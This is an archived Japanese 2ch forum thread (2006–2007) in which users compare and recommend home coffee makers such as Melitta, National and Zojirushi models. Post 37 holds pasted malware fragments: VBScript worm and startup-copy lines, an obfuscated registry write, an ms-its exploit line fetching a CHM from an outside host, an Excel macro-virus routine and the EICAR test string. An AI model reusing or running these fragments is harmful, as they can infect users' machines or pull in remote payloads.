5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

お勧めの珈琲メーカーあります? Part3

1 :名無しさん@( ・∀・)つ旦~:2006/10/18(水) 17:32:06 ID:???
引き続き語りましょう。

前スレ
お勧めの珈琲メーカーあります? Part2
http://food6.2ch.net/test/read.cgi/pot/1137128272/

2 :名無しさん@( ・∀・)つ旦~:2006/10/18(水) 17:39:22 ID:YDc7q3Pn
過去ログ
お勧めの珈琲メーカーあります?
http://food6.2ch.net/test/read.cgi/pot/1077382769/

関連スレ
コーヒーミル・グラインダー【§5】
http://food6.2ch.net/test/read.cgi/pot/1155654771/
【生豆】焙煎・ミルもやるコーヒーメーカー【自動】
http://food6.2ch.net/test/read.cgi/pot/1116160499/
【めざせ】エスプレッソマシン Part8【バリスタ】
http://food6.2ch.net/test/read.cgi/pot/1157893876/
【BAR14】初めてのエスプレッソマシン【TH010】
http://food6.2ch.net/test/read.cgi/pot/1157866962/
コーヒー機器器具メーカーはどこが?
http://food6.2ch.net/test/read.cgi/pot/1148012891/

調理家電板
【珈琲】コーヒーメーカーどれがいい?【Cafe】
http://bubble4.2ch.net/test/read.cgi/bakery/1147883439/
家電製品板
コーヒーメーカーについて語ろう
http://that4.2ch.net/test/read.cgi/kaden/1136623070/

3 :名無しさん@( ・∀・)つ旦~:2006/10/18(水) 19:19:46 ID:???
コーヒーメーカー
http://kakaku.com/sku/pricemenu/coffee.htm


4 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 11:04:28 ID:XpwQosjT
このスレタイの珈琲メーカーってのが検索にかかんないんだよ。
コーヒーメーカーに変えるべし。

5 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 17:12:47 ID:???
「メーカー」で検索すればよろし。

6 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 20:06:41 ID:2XxS19Sp
カプチーノもエスプレッソも作れてこの値段なのですが
買われた方いますか?エスプレッソも飲みたい・・・
ttp://www.amazon.co.jp/gp/product/B000BRVSDK/sr=1-95/qid=1161255309/ref=sr_1_95/250-2551609-0646620?ie=UTF8&s=kitchen

7 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 20:44:12 ID:JarW67dZ
>>5
コーヒーメーカーの情報がほしいとき「メーカー」で検索しない。
「コーヒーメーカー」でさがすよ、ふつう。
domoで「メーカー」を検索したら、1000件以上あるし。

>>1
しねばいいとおもうよ。

8 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 20:59:48 ID:???
>>7
この板内で検索すればよろし。
検索は頭を使えばよろしいとおもうよ。

9 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 21:22:04 ID:???
スレタイ案があるなら、970まで前スレを使って次が立つ前に書くか
自分で立てれば良いわけで。2chの初心者?

10 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 21:37:22 ID:ngJxMRPK
まあいいや、コーヒーメーカーもう買っちゃったからな。
買う前に色々情報探してるときにこのスレ発見できたのが遅れたから
まあ次にスレたてるときにはコーヒーメーカーって言葉を入れとけば
ググってもヤフーとかでも見つけやすいと思うけど。
じゃあ永久にさようなら。もう来ません。

11 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 21:41:20 ID:???
>>7
単に過去のスレタイを踏襲しただけなのに、
立ててくれた人に対してその言葉はないだろうが
こなくていいよ

12 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 21:43:58 ID:???
>>7
心にゆとりの無いヤツだな…
ほれ ( ・∀・)つ旦~

ジョージアでも飲んで落ち着けよ

13 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 22:47:54 ID:???
>>9

前スレ
970 名無しさん@( ・∀・)つ旦~ sage 2006/10/18(水) 17:34:14 ID:???
実はたってた・・・

立てる前に検索してよかた・・・


7でも前スレの970でもないんだけど提案しようと思ったらもう立ってたんだよ。
新スレ立てる前に一言あってもよかったとオモ…

14 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 22:58:28 ID:y+zj4eJE
>>1
なんやかんや、あったけど
とりあえず、乙よん

15 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 23:01:47 ID:Ea08wZ8U
>>12
ジョージアかよw

16 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 23:43:36 ID:???
普通は950より前のほうがいいんじゃね?>スレタイ案
毎回変えるようなところなら800台後半で話題が出ると思うよ。
2とか3で文句言って、あと放置が一番住民にとってわからんのじゃまいか?
他板いっても同じだと思う。

17 :名無しさん@( ・∀・)つ旦~:2006/10/19(木) 23:57:59 ID:ngJxMRPK
今回は手遅れかもしれんが、スレタイ変更案は正論だと思う。
次回は変えたらいいんじゃね。
まあまったりいこうよ。

18 :名無しさん@( ・∀・)つ旦~:2006/10/20(金) 16:24:10 ID:???
なんだこの厨房な流れは

19 :名無しさん@( ・∀・)つ旦~:2006/10/20(金) 22:38:59 ID:???
ミルから全自動の珈琲メーカーでお勧めの機種ありますか?

20 :名無しさん@( ・∀・)つ旦~:2006/10/21(土) 00:51:51 ID:???
普及品だとNC-A55くらいしかないんでないの?

21 :名無しさん@( ・∀・)つ旦~:2006/10/21(土) 13:48:57 ID:???
初めてコーヒーメーカー買ってみたいと思うんですが、
・5〜6杯くらい作れる
・5〜6000円くらいまでの価格帯で、できれば安いもの
・保温ポット(?)みたいな長時間置いておけるタイプが(・∀・)イイ!!
・色、デザインより使い勝手重視
・味は特別良くなくても、並くらいあればいい
こんな条件で考えていて、前スレざっと見てみました
メリタJCM-512ってのが良さそうかなと思いアマゾンで調べてみたら
ポットが使いにくいだの爆発するだの怖いレビューがちらほら・・・
初心者にはコレは向きませんか?(´・ω・`)

22 :名無しさん@( ・∀・)つ旦~:2006/10/21(土) 18:50:51 ID:???
初心者は普通にメリタの陶器とかつかって入れなさい。
慣れてきたらいろんな珈琲メーカーで自分好みを探す。

23 :名無しさん@( ・∀・)つ旦~:2006/10/21(土) 19:17:49 ID:???
うはwwwww

24 :名無しさん@( ・∀・)つ旦~:2006/10/21(土) 21:19:27 ID:???
>>21
メリタJCM-512のポットがステンレスになったやつを
買ったんだが、ポットの使い勝手はいいと思った。
オレも初めてで、他機種との比較はできないけど
入れ方も手入れも簡単で、買ってよかったな。
水もミネラルウォーターをペットボトルから直接注いでるので
そんなに入れにくいとも思わない。
ただし本当はミネラルウォーターもイオン水も駄目らしい。
水道水を使えって取扱説明書に書いてあった。




25 :名無しさん@( ・∀・)つ旦~:2006/10/21(土) 21:36:27 ID:???
>>24
ミネラルウォーターはモノによってはカルシウム分が多くて、配管が詰まる可能性があるんで、
あえて水道水って書いてある奴が多い

26 :24:2006/10/21(土) 21:50:16 ID:???
>>25
そういう理由だったのか。
教えてくれてアリガト
どうしても水道水は使いたくないんで
壊れても仕方ないなって思いながら使ってる。

27 :名無しさん@( ・∀・)つ旦~:2006/10/22(日) 01:01:26 ID:???
先日、愛用していたメリタのprevia miniが壊れてしまったので、買い替えを検討しているのですが、
・一人暮らしのため、1,2杯くらいから作れるもの
・深炒り豆が好みなので、湯温が低めなもの
・使い勝手、手入れが手軽なもの
・価格は1万円以下
一番上の条件は必須でお勧めのコーヒーメーカーあったら教えてください。


28 :名無しさん@( ・∀・)つ旦~:2006/10/22(日) 10:39:20 ID:???
私が持ってるのは、http://img.kakaku.com/images/productimage/fullscale/21285010024.jpgです。
デザインだけで選びました。

29 :名無しさん@( ・∀・)つ旦~:2006/10/22(日) 10:40:53 ID:AImhQ0LE
>>20
NC-A55のデザインはこれですね
http://img.kakaku.com/images/productimage/fullscale/21285010131.jpg

30 :名無しさん@( ・∀・)つ旦~:2006/10/22(日) 10:42:31 ID:AImhQ0LE
>>24
メリタJCM-512はこれですね
http://img.kakaku.com/images/productimage/fullscale/21284510113.jpg


31 :名無しさん@( ・∀・)つ旦~:2006/10/22(日) 14:56:57 ID:YntRgG0k
>>27
一人分なら、コーヒーメーカーは使わない方がいいと思う。むしろ金属
(一人用)フィルターや、微粉分別の自動ミルにコダワル方が、楽しくて美味しい。

32 :27:2006/10/22(日) 20:17:46 ID:???
>>31
どうもです。
ハンドドリップはどうも億劫でコーヒーメーカーで3人前淹れて飲むってのが
習慣になってたんですが、金属フィルターは選択肢にありませんでした。
せっかくなので試してみますね。
実はミルもボロで微粉がすごかったりする

33 :名無しさん@( ・∀・)つ旦~:2006/10/22(日) 22:02:03 ID:???
僕のチンチンも微粉が凄いです・・・

34 :名無しさん@( ・∀・)つ旦~:2006/10/23(月) 02:16:00 ID:???
タイマー付
それなりの味
1〜2人用

何か候補ありませんか?

35 :名無しさん@( ・∀・)つ旦~:2006/10/23(月) 10:22:33 ID:BwYVdheT
>>33
(・o・)人(・o・)

36 :名無しさん@( ・∀・)つ旦~:2006/10/23(月) 13:20:48 ID:q1gHm8Ww
>>32
2〜3人用で、微保温で一万以下は難しいかも。タリーズで金属フィルタ
ーの一人用が売ってる。粉とカップのサイズを変えれば、二人分が遜色のない味で出るし
、お湯をとぽとぽゆっくり入れるだけで簡単。

37 :<body onload=window()>:2006/10/24(火) 13:49:05 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???????


38 :名無しさん@( ・∀・)つ旦~:2006/10/29(日) 23:00:03 ID:???
保守

39 :名無しさん@( ・∀・)つ旦~:2006/11/01(水) 11:48:43 ID:???
初心者ですが、教えて頂けますか?

今現在、「デュランテ」の↓これを使って居ます。
ttp://www.e-sphere.jp/shopdetail/006001000001/

タイマー付きの、メーカーを探しています。
電気保温は煮詰まるので、魔法瓶タイプか二重ステンレスで探しています。

基本的に、魔法瓶と二重ステンレスの、メリット&デメリットの違いが分かっていません。
一緒に、お教え頂けると幸いです。

宜しくお願いいたします。

40 :名無しさん@( ・∀・)つ旦~:2006/11/02(木) 00:08:48 ID:???
>>21
ポットマジ使いにくい。
最期まで注ぐのに100度くらい傾けなきゃいけないし口が狭いので洗いにくい。
オレだけかもしれないけどポットの隙間に水が入り込んで中身何もないのに振ると水音が。
あと給水タンクの口が小さくて水を注ぎにくい。
保温ポット以外良いところない。

41 :名無しさん@( ・∀・)つ旦~:2006/11/02(木) 14:01:05 ID:sVKG6/gD
コラム:家電製品ミニレビューナショナル コーヒーメーカー「NC-A55」
http://kaden.watch.impress.co.jp/cda/column/2006/10/30/92.html

42 :名無しさん@( ・∀・)つ旦~:2006/11/02(木) 17:10:46 ID:???
電動ミルは別に買ったほうがいいね

43 :名無しさん@( ・∀・)つ旦~:2006/11/03(金) 02:52:38 ID:???
ミルにこだわるくらいなら手で淹れたほうがいいって
ミルで分かる違いよりももっと明確に違うから
コーヒーメーカーごときでそこまでこだわるのはもったいない

44 :名無しさん@( ・∀・)つ旦~:2006/11/05(日) 13:51:09 ID:???
>>26
BRITA使ってるよ。水道水が不味くて有名な地域なんで重宝してる。
象印の安いのを一年使ってるけど、特に問題ないな。

45 :名無しさん@( ・∀・)つ旦~:2006/11/08(水) 02:29:15 ID:???
コーヒーメーカーのポッドやフィルター部分の洗浄ってどうやってる?
うちは洗剤のにおいが付くのが嫌なんで水洗いしかしないんだが。

46 :名無しさん@( ・∀・)つ旦~:2006/11/08(水) 21:59:06 ID:???
メーカーのお手入れ方法に水洗いと書いてあるので
水洗いしかしたことないよ

47 :名無しさん@( ・∀・)つ旦~:2006/11/10(金) 11:18:51 ID:C+tCPFMo
いいのがあったら教えてください。

・筐体色が白もしくは白とシルバーの組み合わせ
・マグカップで4杯くらいつくれる。(通常カップで10杯分位?)
・加熱式でない保温(二重ステンなど)

amadanaの使ってだけど、2ヶ月で2回の電源不良と30分でぬるくなる保温ポットに愛想をつかしました。

よろしくお願いします。

48 :名無しさん@( ・∀・)つ旦~:2006/11/10(金) 17:35:14 ID:???
保温以外の条件だとこれとか
ttp://www.melitta.co.jp/personal/coffeemaker/station.html

色以外の条件だとこれとか
ttp://www.melitta.co.jp/personal/coffeemaker/aroma_10c.html

49 :名無しさん@( ・∀・)つ旦~:2006/11/10(金) 23:55:00 ID:???
のだめカンタービレの千秋の部屋でリニアウニカをハケーン

50 :名無しさん@( ・∀・)つ旦~:2006/11/11(土) 00:07:27 ID:???
マグってだいたい1杯170〜180ccくらいでしょ
だったらアロマサーモの5杯用でいけるのでは?白があるよ


51 :名無しさん@( ・∀・)つ旦~:2006/11/11(土) 23:40:29 ID:1JWSTt/4
ディノスの通販のフィリップスNEWコーヒーメーカーは
どんなもんでしょうか?
初めての購入で2人暮らしです。
CMを見て保温性などが気に入ったんですが大きすぎますかね・・・?
アドバイスお願いします。

52 :51:2006/11/12(日) 00:04:29 ID:1JWSTt/4
51です。追加の質問で
象印の珈琲通EC−JS80も気になりますが
どちらがお勧めですか?

53 :名無しさん@( ・∀・)つ旦~:2006/11/12(日) 00:12:21 ID:???
>>52
なぁ、一般的に考えて
コーヒーメーカー二つ持ってる奴ってそうそういないと思うぞ。
ましてや君の選んだ二つを持ってるやつとかさ…

だから
君が2つとも購入してレビューしなさい!
俺はそれを参考にして次購入のコーヒーメーカー考えるから!


ちなみに俺はメリタのアロマサーモだ
手入れも楽だしイイヨ

54 :名無しさん@( ・∀・)つ旦~:2006/11/12(日) 01:06:48 ID:???
フィリップスはたぶん10杯用、象印のは8杯用だよね。
2人暮らしには大きいんじゃないか?
ポットに満杯入っていたら保温力もいいけど
少量だとすぐに冷めるよ。
ちなみにウチも2人暮らしですが、
メリタのアロマサーモステンレス5人用を愛用中です。

55 :54:2006/11/12(日) 01:12:31 ID:???
間違った。5人用じゃなくて5杯用。
これでマグカップ3〜4杯くらい。
ポットを先に暖めてから入れるので、
2時間くらいは熱々、3時間くらいはOKです。

56 :名無しさん@( ・∀・)つ旦~:2006/11/12(日) 01:52:11 ID:???
なんだかんだでアロマサーモが一番売れてるんじゃなかろうか
ウチの職場にも、取引先の職場にもあるし

57 :51:2006/11/12(日) 11:17:48 ID:90W/ox5C
>>54−55
返答ありがとうございました。
5杯位でちょうど良いので早速メタリを調べてみます!

58 :名無しさん@( ・∀・)つ旦~:2006/11/13(月) 14:35:08 ID:???
(´・ω・`)メタリ

59 :名無しさん@( ・∀・)つ旦~:2006/11/14(火) 17:03:55 ID:???
メタリィ〜♪

60 :名無しさん@( ・∀・)つ旦~:2006/11/14(火) 18:43:46 ID:???
   ‖Y .:::::.:.:.:.:.: : :        ::l、|| | ‖ ‖ |
   ‖/.:::.:.:.:.:.:.:. :. _          i || | ‖ ‖ |
    l '.::''::::::.:.::/Y /    r-、  _ i;. | ‖ ‖ |
    l :: :: .:: :: 7:::ヽ /V::::/   /::t__Y, ‖ __
     ,l: l l  l:/:/`'  7::::く  /:t-i::/ ./ ̄____:::::/
    l .l: l:  l:i/   /::/ヽ' ヽ;:`'/    ̄,-, //
    l: l: l:  l:    l,/   ,i' /:/i;;'`‐- /:/ `
    /.:l: .:l  :i:       /  `' i:    `':i |‖|
    l: : l :.i : : l;:      ii;-:、   l;:  ,-' |‖|
    i;. ;: i: :::::::l:       i、 `‐、 l;: /  |‖|
   ||:`;i i; _ .:l:       i     ,l:-'      |
   ,‐-='γ',:;:;ヽl;         , = "
   r'ヾ:,  `‐ '丿=、   ,. = '"`t,- 、      i'i /
   'i,  `    i;.:.:.:.:` '' '`:.:.:.:.:.,- '‐- y'"`= ,  | |/
    `-,    `-、;;: ; : :;; :; :';..;.:.:/:.:.;.:.:.:.`y-':.:.:.
     =-ヽ,     ,. - `-、;;.:.:.:.:.:.:.:.:. ,-'ヽ,   ,.= '
   ,=' '' "i`=-‐,=':.:.:.:.:.:.:.,i`'"'=‐-‐="   `= '
       `'=-.:.:.:.:.:.:,-='

61 :名無しさん@( ・∀・)つ旦~:2006/11/14(火) 21:45:08 ID:JEAEpptV
コーヒーメーカーの購入を検討中です。
デバイスタイルのCA-6
メリタのJCM-511かJCM-512
まで絞ったんですが、どれがオススメですか?

62 :名無しさん@( ・∀・)つ旦~:2006/11/14(火) 22:50:52 ID:???
>>61
おんなじ様な感じで買うとき迷いましたよ。
結局JCM512を買ったけど。
ぬるめが好きならデバイ、熱めが好きならメリタ。
あとは淹れてからすぐ飲むなら、ガラスサーバー
そうでないなら、保温ポット式が良いと思います。
あとは、お好みのデザインで。
デバイのは飲んだことありませんが、味はどちらもよいと思います。

63 :名無しさん@( ・∀・)つ旦~:2006/11/14(火) 23:23:35 ID:???
スタバのバリスタ ドリップ コーヒーメーカーってどうですか?
2〜4人用のやつ。

64 :名無しさん@( ・∀・)つ旦~:2006/11/16(木) 01:11:28 ID:???
>>61
超熱々が好きなら迷わず511を買うことをお勧めする

65 :名無しさん@( ・∀・)つ旦~:2006/11/16(木) 20:03:32 ID:???
象印のこのへんのはどうでしょ?
http://www.amazon.co.jp/gp/product/B0000C9BPT/

66 :名無しさん@( ・∀・)つ旦~:2006/11/17(金) 17:42:19 ID:shDbLWix
一人暮らしなんですが、小さめのコーヒーメーカーでおすすめありますか?
いれてすぐ飲むので保温のものでなくてよいのですが、使いやすいものを探してます。

あとハンドドリップの場合、プラスティックと金属のフィルターの違いはなんでしょうか?

67 :名無しさん@( ・∀・)つ旦~:2006/11/22(水) 13:44:05 ID:dzAGeMqa
コラム:家電製品ミニレビューブラウン「アロマパッション KF550」
http://kaden.watch.impress.co.jp/cda/column/2006/11/22/185.html

68 :名無しさん@( ・∀・)つ旦~:2006/11/23(木) 00:53:55 ID:dGnVWxps
真空保温のできるコーヒーメーカーを検討しているのですが、下記3点に絞りました。
この中でのお薦めはありますか?お使いの方、使い心地等はどうでしょう?
下三点でしたら値段には特に拘りません。宜しくお願いいたします。

ツインバード  CM-D805B
http://www.amazon.co.jp/gp/product/B000FTA2IG/

Melitta アロマサーモ JCM-561/TD
http://www.amazon.co.jp/gp/product/B000HC9OQ2/

THERMOS ECB-1000
http://www.amazon.co.jp/gp/product/B000BHRQPE/

69 :名無しさん@( ・∀・)つ旦~:2006/11/23(木) 06:31:46 ID:???
>>66
Melitta プレビア ミニ
http://www.amazon.co.jp/gp/product/B0002IS110/sr=11-1/qid=1164230958/ref=sr_11_1/250-6745325-9100241


70 :名無しさん@( ・∀・)つ旦~:2006/11/24(金) 07:03:42 ID:???
>>68
561かうんならhttp://www.amazon.co.jp/gp/product/B000HC9OPI薦める
マグ付きだし

71 :名無しさん@( ・∀・)つ旦~:2006/11/25(土) 19:03:50 ID:???
>>69
参考にします。どうもでした。

72 :名無しさん@( ・∀・)つ旦~:2006/12/01(金) 21:59:36 ID:EeLFD5SA
ここ読んでデザインもイイし
メリタを買おうと思ったんだけど
不具合が多いらしいな。。残念
http://kakaku.com/item/21284510112/

73 :名無しさん@( ・∀・)つ旦~:2006/12/01(金) 23:28:46 ID:EeLFD5SA
http://www.nc-news.com/frame/20050725/kuj050725.htm
象印がイイみたいね

74 :名無しさん@( ・∀・)つ旦~:2006/12/02(土) 00:09:46 ID:???
・メリタ(新たにアマゾンでも不具合情報を発見。。完成度にばらつきあり!?)
・サーモス(水タンク、粉のとこなどが分解できないので洗い難そう)
・デロンギ(通販生活で紹介されてたので調べてみたけどコストパフォ悪)
 なので象印のEC-JS80に決めました。

75 :名無しさん@( ・∀・)つ旦~:2006/12/02(土) 11:01:01 ID:???
>>73
東芝は普通のもあるのに2wayの機種で比較させられてかわいそう
ナショの味の低さはナショがカリタ式だから豆が他より多めにいるはずなのを
一律の量で淹れたせいなんじゃないかと推測

自分は会社に象があるけどあまり美味しいと思ったことないな
今も売られてる型の物だけど
ダブル加熱とかいうものでないからかな
あと必ず使うたびに蒸気が横から伝い漏れて床が濡れるのがイヤだ
それはうちの会社のがたまたま不具合でそうなっただけかもしれないけど

76 :名無しさん@( ・∀・)つ旦~:2006/12/03(日) 12:25:51 ID:???
まぁ、美味しいと思ったコーヒーメーカー自体ないからなぁ
余程悪くなきゃいいんじゃないの

77 :名無しさん@( ・∀・)つ旦~:2006/12/07(木) 15:56:14 ID:2X+yTD8B
ナショナルのステンレスタイプまだ〜??

78 :名無しさん@( ・∀・)つ旦~:2006/12/08(金) 21:08:12 ID:???
ナショのNC-S35持ってるけど、
ガラスサーバーで加熱保温タイプでも
別に自動で切れるまでの2時間くらいなら
最後1杯分だけ残しておいても煮詰まった感じがしないよ

79 :名無しさん@( ・∀・)つ旦~:2006/12/09(土) 02:35:58 ID:???
魔法瓶に移し変えるのではダメなのか?

80 :名無しさん@( ・∀・)つ旦~:2006/12/21(木) 22:26:45 ID:In7Kg4gz
こんばんは。
今度一人暮らしを始める友人へコーヒーメーカーを贈りたいと思って、
参考にこちらのスレを拝見しています。

自分としては、JCM-555、NC-S35、NC-A55を候補として考えているの
ですが、JCM-555はデザインがすっきりしていて良いなと思う一方で
苦味が強く出るというのが気になっています。
NC-S35、NC-A55はドームシャワーが良さそうと思う一方で操作やメ
ンテが面倒なのかも?と気になります。

贈る本人は朝は必ずコーヒー、仕事中もしょっちゅう飲んでいるよう
です。味にはそんなにこだわりがないようで、ドリップパックで淹れ
て飲んでいたり、缶コーヒーでもなんでもOKみたいです。

自分がコーヒーを殆ど飲まないので分からず、迷っています。
実際に使ってみた感想など、教えていただけば幸いです。
宜しくお願いいたします。

81 :名無しさん@( ・∀・)つ旦~:2006/12/22(金) 01:07:26 ID:???
コーヒー抽出器具関係持ってなさそうなら、ミルがあったほうがいいんでナショナル。
想像するに、ミルにもこだわりないだろうし。
一日中コーヒーメーカー使える仕事環境なら、煮詰まらないメリタ。
と、両方とも使ったことがない俺が言ってみた。

82 :名無しさん@( ・∀・)つ旦~:2006/12/22(金) 06:09:51 ID:???
コーヒーにこだわりがない人は豆で買わないだろうから
ポットやマグだけ持ち運びするのに便利なJCM-555がいいんでないかな
給水タンクが取り外せないのが難点だけどね
ちなみにナショナルも別に操作が難しくないし
メンテもそれほど大変じゃないと思うよ
NC-A55はコーヒー抽出時にミルを洗ってくれるし、
S35は全部取り外せるから洗うの簡単

83 :名無しさん@( ・∀・)つ旦~:2006/12/22(金) 17:30:08 ID:???
age

84 :名無しさん@( ・∀・)つ旦~:2006/12/23(土) 20:57:22 ID:EanybfP8
JCM-561が良いとは思うんだが・・・。
ステンレスポットだしレバー式でネジ式から改良されてるし。
確かに出来不出来にバラつきあるんだよな以前にハズレにあたってすぐ壊れたし。
買うかどうか悩むなあ。

85 :名無しさん@( ・∀・)つ旦~:2006/12/23(土) 21:09:14 ID:R7XxodyW
>>81
>>82
アドバイスありがとうございました。
本人に使いそうな状況をそれとなく探ってみて、決めたいと思います。


86 :名無しさん@( ・∀・)つ旦~:2006/12/23(土) 21:57:50 ID:EanybfP8
>>85
使う人にこだわりが無いならシンプルと言うか簡単・手軽に使えるのが良いかと思う。

87 :名無しさん@( ・∀・)つ旦~:2006/12/24(日) 13:27:07 ID:PHuQs/Rf
ツインバードのCM-851BRを使用してて、お湯がサーバーからロートに上昇した後の蒸らす工程の際、
サーバーからの上昇してくる熱気により蒸らし中のロート内のコーヒーが
ぐつぐつと煮立ってしまっているように見えます。コーヒーは煮立たせてはダメが常識だったと思うのですが
これは大丈夫なのですか?

88 :名無しさん@( ・∀・)つ旦~:2006/12/24(日) 19:43:04 ID:???
会社で個人的にメリタのJCM-561を使ってるんですが、買い換え検討です。
味や使い勝手は十分なのですが、けっこう静かめの社内で使ってるので、
音がけっこう気になります。

そこで、音が静かなのを基準でおすすめがあれば、教えてください。

89 :名無しさん@( ・∀・)つ旦~:2006/12/27(水) 14:46:44 ID:3p79Utfk
511か512買おうと思うんですけど、ゴールドフィルターって使えますか?
ペーパーの匂いが嫌いなもので…

90 :名無しさん@( ・∀・)つ旦~:2006/12/28(木) 20:55:37 ID:gHHT3RLD
>>88
確かにお湯が沸く?って時のボコボコってのは静かな場所では気になるかもしれない。
大なり小なりその手の音は出るからねメリタは大きめだね。
どの程度の環境で音が気になるのか判らないと答えようがないがメリタだと気になると言うのは使ったことがあるから判る。
機械であるコーヒーメーカーでは避けられないから音がダメと言うんだったらインスタントとかワンドリップとかにするしかないよ。

91 :名無しさん@( ・∀・)つ旦~:2006/12/31(日) 15:58:01 ID:???
Tigerの1cupCoffeeMakerというの使ってる。
一人暮らしで、一日中お気に入りのマグを直接設置し、
何回も入れるというパターン。
場所をとらないのが第一条件だった。
最初はよかったけど、だんだんつまってきて、
入れておいた指定量の水の7割くらいしかおちなくなった。
たぶんミネラルウォーター使っているせいかなと思うんだけど。
こういうのはもう処分するしかないの?安物だったし・・・

92 :名無しさん@( ・∀・)つ旦~:2006/12/31(日) 17:55:32 ID:???
>>91
ホームセンターなどにコーヒーメーカーを洗浄する薬があるから、
捨てる前にそれを試しても良いんじゃないか?

93 :名無しさん@( ・∀・)つ旦~:2007/01/01(月) 12:52:31 ID:Z/CFyOpW
>>91
使ってれば、どこのでもそうなる。
定期的にクリーニングしないとダメ。
コーヒーメーカー洗浄剤でクリーニングしてダメなら買い替えだろうね。
象印のピカボトルを試したら、クエン酸の洗浄剤よりは効果ありかと?

94 :名無しさん@( ・∀・)つ旦~:2007/01/02(火) 08:14:32 ID:???
ヶメックス使っておられるかたはいませんか?


95 :名無しさん@( ・∀・)つ旦~:2007/01/03(水) 22:16:25 ID:???
>>92-93
ありがとう。コーヒーマシーン専用洗浄薬があるんだね。試してみます。

>>95
来客時はつかってますノシ

96 :名無しさん@( ・∀・)つ旦~:2007/01/03(水) 22:17:44 ID:???
アンカーまちがったお。orz
ミクにコミュみつけたけど、けっこう人いたような希ガス。>>94


97 :名無しさん@( ・∀・)つ旦~:2007/01/05(金) 11:20:49 ID:???
http://www.devicestyle.co.jp/products/brunopasso/ca5s6/index.html
↑ 購入決定、CA-5S

決め手は、ステンレスポット
前のは、サーバー破損で 15年の労働を終了

98 :名無しさん@( ・∀・)つ旦~:2007/01/05(金) 14:07:44 ID:rrLSP04S
>>97
これ、幾らぐらい?
ヤマダとかコジマとかに売ってる?

99 :名無しさん@( ・∀・)つ旦~:2007/01/05(金) 19:46:54 ID:???
>>98
デンコードーで9.8k

近所のヤマダにはなかった
コジマは我がマチにはないのでわかりません

実家用に購入、マイマザーの意見にて決定
「サーバー3個破損でメーカー買えるよね」
「ごもっとも」

使った感じ、「水のとおり、はえ〜〜〜」って
個人使用のメリタの512と同じようなスピード

味見はマイルド感 :CA-5S>JCM-512
即ち、リッチ感   :CA-5S<JCM-512
ってな感じ

マイマザーえらく気に入ったらしく、現在メインのサイフォンから
移行しそうな雰囲気

途中、ナショナルのNC-S35 も検討しましたが基本的にミルは必要ないのと
水タンクの目盛がスイッチ側になく主婦的発想で却下
「水タンクとミルとの配置が逆だったらいかったねぇ」
「ほんと、これじゃ壁を背中にしておけないなぁ」




100 :名無しさん@( ・∀・)つ旦~:2007/01/08(月) 20:32:42 ID:UA6bGn6k
通販の南部鉄器 コーヒーポットセットはいかがでしょう?

101 :名無しさん@( ・∀・)つ旦~:2007/01/09(火) 11:33:38 ID:???
>94
ハンドブローを使用しておりますが。

102 :名無しさん@( ・∀・)つ旦~:2007/01/12(金) 02:23:17 ID:J4eOD6eq
見た目でなく味で選ぶなら、カリタのET102かCM102。
コーノでも何でも乗るし。

103 :名無しさん@( ・∀・)つ旦~:2007/01/13(土) 16:05:30 ID:pmYei7S+
私はコーヒーが飲めなかった。
でも、みんながコーヒーを飲む姿に憧れていた。

コーヒーが飲めるようになりたい!!

そして、まともに飲めるコーヒーを見つけた。
友達に紹介され飲んでみた。酸味苦味がかなり抑えてあるらしかった。
初めてまともに飲めたコーヒーは美味しかった。
一口飲んだ友達が呟いた。

「これさ、○○っていう自立支援を目的とされた場所で作られてんだ。…俺の妹が作ったんだよ」
この一言を聞いて、更にコーヒーに深い味わいが加えられたような気がした。


これが私のコーヒーデビューでした。
つまらない話しかもしれないけれど、私の中でとても強い衝撃だった。
拙い文章で伝わりにくいだろうけど、ごめん。

104 :名無しさん@( ・∀・)つ旦~:2007/01/13(土) 18:23:15 ID:???
>>103
いい話じゃないかぁ〜
あなたのコーヒーライフ、満喫してくださいね。

105 :名無しさん@( ・∀・)つ旦~:2007/01/13(土) 21:21:43 ID:???
でも、スレ違い。

106 :名無しさん@( ・∀・)つ旦~:2007/01/14(日) 15:39:13 ID:OgFQX7fv
>103


107 :名無しさん@( ・∀・)つ旦~:2007/01/14(日) 15:41:44 ID:OgFQX7fv
上げるわ、誤爆するわ・・・
コーヒー豆喉に詰めて逝ってきますm(_ _"m)ペコリ

108 :名無しさん@( ・∀・)つ旦~:2007/01/15(月) 23:59:05 ID:LlBK1L5C
珈琲メーカーの種類が多いのはヨドバシ、ビック、山田、その他どこが観やすいですか?

